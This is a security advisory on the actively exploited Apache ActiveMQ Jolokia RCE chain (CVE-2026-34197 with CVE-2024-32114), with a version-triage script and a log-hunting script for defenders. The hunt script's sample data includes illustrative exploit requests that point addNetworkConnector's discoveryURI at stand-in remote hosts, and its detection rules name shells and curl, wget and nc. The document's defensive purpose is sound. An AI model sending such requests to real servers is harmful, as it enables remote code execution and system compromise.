Critical 13-Year-Old RCE Flaw in Apache ActiveMQ (CVE-2026-34197) Actively Exploited

Unauthenticated RCE Possible in Apache ActiveMQ by Chaining New and Old Vulnerabilities

CRITICAL
April 13, 2026
Vulnerability, Patch Management, Cyberattack

Related Entities

Organizations: Apache Software Foundation, Horizon3.ai, SentinelOne

CVE Identifiers: CVE-2026-34197 (CRITICAL), CVE-2024-32114 (HIGH)

Full Report

Executive Summary

Security researchers have disclosed a critical remote code execution (RCE) vulnerability, CVE-2026-34197, in Apache ActiveMQ Classic, a popular open-source message broker. The vulnerability, which has been latent in the codebase for 13 years, is being actively exploited in the wild. The flaw resides in the Jolokia JMX-HTTP bridge and allows an authenticated attacker to achieve RCE. However, the threat is magnified because it can be chained with CVE-2024-32114, a flaw that makes the vulnerable endpoint completely unauthenticated. This combination allows attackers to achieve unauthenticated RCE, leading to a full system compromise. The Apache Software Foundation has released patches, and immediate action is required.

Vulnerability Details

  • CVE-2026-34197: This is an improper input validation vulnerability. An authenticated attacker can send a specially crafted request to the addNetworkConnector() operation via the Jolokia API endpoint (/api/jolokia/). By providing a malicious discovery URI, the attacker can trick the ActiveMQ broker into loading a remote Spring XML application context. This allows them to execute arbitrary Java code within the context of the ActiveMQ process.

  • CVE-2024-32114: This vulnerability, affecting ActiveMQ versions 6.0.0 through 6.1.1, improperly removes security constraints from the /api/* path. The practical effect is that the entire Jolokia API, including the vulnerable addNetworkConnector() method, becomes accessible without any authentication.

The chaining of these two vulnerabilities is what makes this threat so severe. An attacker needs no prior access or credentials to achieve full remote code execution on a vulnerable, internet-facing ActiveMQ server.

Affected Systems

  • CVE-2026-34197 affects all versions of Apache ActiveMQ Classic prior to 5.19.4 and versions 6.0.0 through 6.2.2.
  • The unauthenticated exploit chain is possible on versions 6.0.0 through 6.1.1 where both vulnerabilities are present.
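To turn the affected-version ranges above into a repeatable check over a scanner inventory, here is a small triage helper. It is an added example, not Apache or vendor tooling; the only inputs it assumes are plain major.minor.patch version strings (any hyphenated suffix such as "-SNAPSHOT" is ignored), and the ranges and fixed releases are exactly the ones stated in this report.

```python
from __future__ import annotations

from dataclasses import dataclass


def parse_version(text: str) -> tuple[int, int, int]:
    """Turn '5.18.3' or '6.1.1-SNAPSHOT' into a comparable (major, minor, patch)
    tuple. Assumption: ActiveMQ Classic versions are plain dotted triples; any
    hyphenated suffix is dropped before parsing."""
    core = text.strip().split("-", 1)[0]
    parts = core.split(".")
    if len(parts) != 3 or not all(p.isdigit() for p in parts):
        raise ValueError(f"unrecognised ActiveMQ version string: {text!r}")
    major, minor, patch = (int(p) for p in parts)
    return (major, minor, patch)


@dataclass(frozen=True)
class Triage:
    version: str
    cve_2026_34197: bool         # Jolokia addNetworkConnector RCE (needs auth on its own)
    cve_2024_32114: bool         # security constraints removed from /api/*
    unauthenticated_chain: bool  # both flaws present: unauthenticated RCE
    upgrade_to: str | None       # fixed release named in the report, if any


def triage(version_text: str) -> Triage:
    """Classify one ActiveMQ Classic version against the ranges in the report:
    CVE-2026-34197: < 5.19.4, and 6.0.0 through 6.2.2 (fixed in 5.19.4 / 6.2.3)
    CVE-2024-32114: 6.0.0 through 6.1.1"""
    v = parse_version(version_text)
    if v < (6, 0, 0):
        rce = v < (5, 19, 4)
        auth_bypass = False
        fix = "5.19.4" if rce else None
    else:
        rce = v <= (6, 2, 2)
        auth_bypass = v <= (6, 1, 1)
        fix = "6.2.3" if rce else None
    return Triage(version_text, rce, auth_bypass, rce and auth_bypass, fix)


def triage_inventory(versions: list[str]) -> list[Triage]:
    """Triage a list of observed versions (e.g. a scanner export), ordering the
    unauthenticated-chain cases first so they are patched first."""
    results = [triage(v) for v in versions]
    return sorted(results, key=lambda t: (not t.unauthenticated_chain, not t.cve_2026_34197))


if __name__ == "__main__":
    # Constructed inventory, not real hosts
    for t in triage_inventory(["6.1.1", "5.18.3", "6.2.2", "6.2.3", "5.19.4"]):
        print(t)
```

The ordering matters operationally: a 6.0.0 through 6.1.1 broker exposed to the internet is reachable by anyone, so it goes to the top of the patch queue ahead of 5.x and 6.2.x hosts that at least still require credentials.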

Exploitation Status

Multiple security firms, including Horizon3.ai and SentinelOne, have confirmed that CVE-2026-34197 is being actively exploited in the wild. Proof-of-concept (PoC) exploit code is publicly available, lowering the bar for attackers to weaponize this vulnerability.

Impact Assessment

Successful exploitation of this vulnerability chain results in a complete compromise of the ActiveMQ server. An attacker can:

  • Execute arbitrary commands with the privileges of the ActiveMQ service account.
  • Steal or manipulate all data passing through the message broker.
  • Use the compromised server as a pivot point to attack other systems within the internal network.
  • Deploy ransomware or other malware.

Given that ActiveMQ is often used as a central messaging backbone for enterprise applications, a compromise could have devastating and widespread consequences.

Cyber Observables for Detection

Security teams should hunt for evidence of exploitation in their logs:

  • Type: url_pattern
    Value: /api/jolokia/
    Description: Any access to this URL path should be scrutinized. On patched or properly configured systems, it should not be exposed.
    Context: Web server access logs, WAF logs, reverse proxy logs
    Confidence: high

  • Type: string_pattern
    Value: addNetworkConnector
    Description: The presence of this string in POST data to the Jolokia endpoint is a strong indicator of an exploitation attempt.
    Context: WAF logs, application-level logging
    Confidence: high

  • Type: string_pattern
    Value: discoveryURI
    Description: The discoveryURI parameter being used with protocols like http:// or ldap:// in a Jolokia request is highly suspicious.
    Context: WAF logs, application-level logging
    Confidence: high

  • Type: process_name
    Value: Unusual child processes of the ActiveMQ Java process
    Description: Monitor for the ActiveMQ JVM spawning shells (sh, bash, cmd.exe) or network tools (curl, wget).
    Context: EDR logs, host-based monitoring (Sysmon Event ID 1)
    Confidence: high

Detection Methods

  1. Vulnerability Scanning: Use a vulnerability scanner to identify all instances of Apache ActiveMQ in your environment and check if they are running a vulnerable version.
  2. Log Analysis: Ingest ActiveMQ and web server logs into a SIEM. Create alerts for any access to the /api/jolokia/ endpoint, especially if it contains the strings addNetworkConnector or discoveryURI.
  3. Network Traffic Analysis: Monitor network traffic for outbound connections from ActiveMQ servers to suspicious IP addresses, which could indicate a reverse shell or data exfiltration.
  4. D3FEND Techniques: Implement D3-NTA: Network Traffic Analysis to detect the anomalous network connections resulting from a successful RCE. Use D3-PA: Process Analysis on the host to detect when the Java process spawns unexpected child processes like a shell.
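The observables table and the Log Analysis and Process Analysis methods above can be exercised together in one hunt script. The following is an added example, not tooling from the report or from Apache: it assumes an access-record layout of client, method, path, status and request body (WAF and application logs carry the body; a plain web-server access log does not), and Sysmon-style process-creation events with ParentImage, ParentCommandLine and Image fields. All sample records are constructed for the demonstration and use TEST-NET addresses; the request bodies are illustrative strings containing the indicators, not real Jolokia message shapes.

```python
import re
from urllib.parse import unquote

# Observables from the report
JOLOKIA_PATH = re.compile(r"^/api/jolokia(/|$)", re.I)
# discoveryURI followed (loosely) by a remote scheme; the report names http:// and ldap://
REMOTE_DISCOVERY = re.compile(r"discoveryURI.{0,6}(https?|ldaps?)://", re.I | re.S)
SHELLS = {"sh", "bash", "dash", "zsh", "cmd.exe", "powershell.exe"}
NET_TOOLS = {"curl", "wget", "nc", "ncat"}


def _basename(path: str) -> str:
    """Last path component, for both POSIX and Windows paths, lower-cased."""
    return re.split(r"[\\/]", path)[-1].lower()


def score_access_record(line: str) -> list[str]:
    """Return the observables matched by one access record (empty = clean).
    Assumed layout: client method path status body (body may be '-')."""
    try:
        _client, _method, path, _status, body = line.split(" ", 4)
    except ValueError:
        return ["malformed record"]
    findings: list[str] = []
    if JOLOKIA_PATH.search(path):
        findings.append("jolokia endpoint access")
        decoded = unquote(body)  # WAFs often log the URL-encoded form
        if "addNetworkConnector" in decoded:
            findings.append("addNetworkConnector in body")
        if REMOTE_DISCOVERY.search(decoded):
            findings.append("discoveryURI with remote scheme")
    return findings


def is_anomalous_java_child(event: dict) -> bool:
    """Sysmon Event ID 1 where the ActiveMQ JVM spawns a shell or network tool.
    The ActiveMQ check is a simple substring match on the parent command line."""
    if event.get("EventID") != 1:
        return False
    parent = _basename(event.get("ParentImage", ""))
    child = _basename(event.get("Image", ""))
    from_activemq = "activemq" in event.get("ParentCommandLine", "").lower()
    return parent in {"java", "java.exe"} and from_activemq and child in SHELLS | NET_TOOLS


# Constructed sample data (TEST-NET addresses; not captured traffic)
ACCESS_LOG = [
    '203.0.113.7 POST /api/jolokia/ 200 {"operation":"addNetworkConnector","discoveryURI":"http://198.51.100.9/x"}',
    '10.0.0.8 GET /api/jolokia/read/java.lang:type=Memory 200 -',
    '10.0.0.5 GET /admin/index.jsp 200 -',
    '203.0.113.7 POST /api/jolokia/ 200 operation%3DaddNetworkConnector%26discoveryURI%3Dldap%3A%2F%2F198.51.100.9%2Fx',
]
PROCESS_EVENTS = [
    {"EventID": 1, "ParentImage": "/usr/lib/jvm/java-17/bin/java",
     "ParentCommandLine": "java -jar activemq.jar start", "Image": "/bin/sh"},
    {"EventID": 1, "ParentImage": "/usr/lib/jvm/java-17/bin/java",
     "ParentCommandLine": "java -jar activemq.jar start", "Image": "/usr/bin/curl"},
    {"EventID": 1, "ParentImage": "/usr/bin/bash",
     "ParentCommandLine": "bash", "Image": "/usr/bin/curl"},
    {"EventID": 3, "ParentImage": "/usr/lib/jvm/java-17/bin/java",
     "ParentCommandLine": "java -jar activemq.jar start", "Image": "/bin/sh"},
]


def hunt(access_log=ACCESS_LOG, process_events=PROCESS_EVENTS) -> dict:
    """Index of access records that matched (with their findings) plus the
    process events that look like the ActiveMQ JVM spawning a shell or tool."""
    access_hits = {i: f for i, line in enumerate(access_log) if (f := score_access_record(line))}
    proc_hits = [e for e in process_events if is_anomalous_java_child(e)]
    return {"access": access_hits, "process": proc_hits}


if __name__ == "__main__":
    for idx, findings in hunt()["access"].items():
        print(f"access record {idx}: {', '.join(findings)}")
    for ev in hunt()["process"]:
        print(f"process anomaly: {ev['ParentImage']} -> {ev['Image']}")
```

Note the tiers: a bare read against /api/jolokia/ (record 1) is only flagged as endpoint access and should be triaged against the expected monitoring sources, while the two POSTs carrying addNetworkConnector and a remote discoveryURI are the high-confidence cases; a shell spawned by a JVM that is not ActiveMQ (event 2) and a non-process-creation event (event 3) are deliberately left out.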

Remediation Steps

  1. Patch Immediately: The primary remediation is to upgrade to a patched version. The Apache Software Foundation has released:
    • ActiveMQ 6.2.3
    • ActiveMQ 5.19.4
  2. Workaround (If Patching is Delayed): If immediate patching is not possible, restrict access to the ActiveMQ web console. Ensure that it is not exposed to the public internet. Access should be limited to trusted administrative hosts via firewall rules. Additionally, ensure the jolokia-agent is not enabled in the configuration if it is not explicitly needed.
  3. Verification: After patching, verify that the vulnerable endpoint is no longer accessible and that the application functions as expected.

Timeline of Events

1. April 13, 2026: This article was published

MITRE ATT&CK Mitigations

The primary mitigation is to apply the security patches provided by Apache immediately.

As a temporary measure, restrict network access to the ActiveMQ web console and API endpoints, ensuring they are not exposed to the internet.

If the Jolokia agent is not needed for monitoring, disable it in the ActiveMQ configuration to remove the attack surface.

Article Author

Jason Gomes

• Cybersecurity Practitioner

Cybersecurity professional with over 10 years of specialized experience in security operations, threat intelligence, incident response, and security automation. Expertise spans SOAR/XSOAR orchestration, threat intelligence platforms, SIEM/UEBA analytics, and building cyber fusion centers. Background includes technical enablement, solution architecture for enterprise and government clients, and implementing security automation workflows across IR, TIP, and SOC use cases.

Areas: Threat Intelligence & Analysis, Security Orchestration (SOAR/XSOAR), Incident Response & Digital Forensics, Security Operations Center (SOC), SIEM & Security Analytics, Cyber Fusion & Threat Sharing, Security Automation & Integration, Managed Detection & Response (MDR)

Tags

RCE, Apache, ActiveMQ, Jolokia, zero-day, CVE-2026-34197
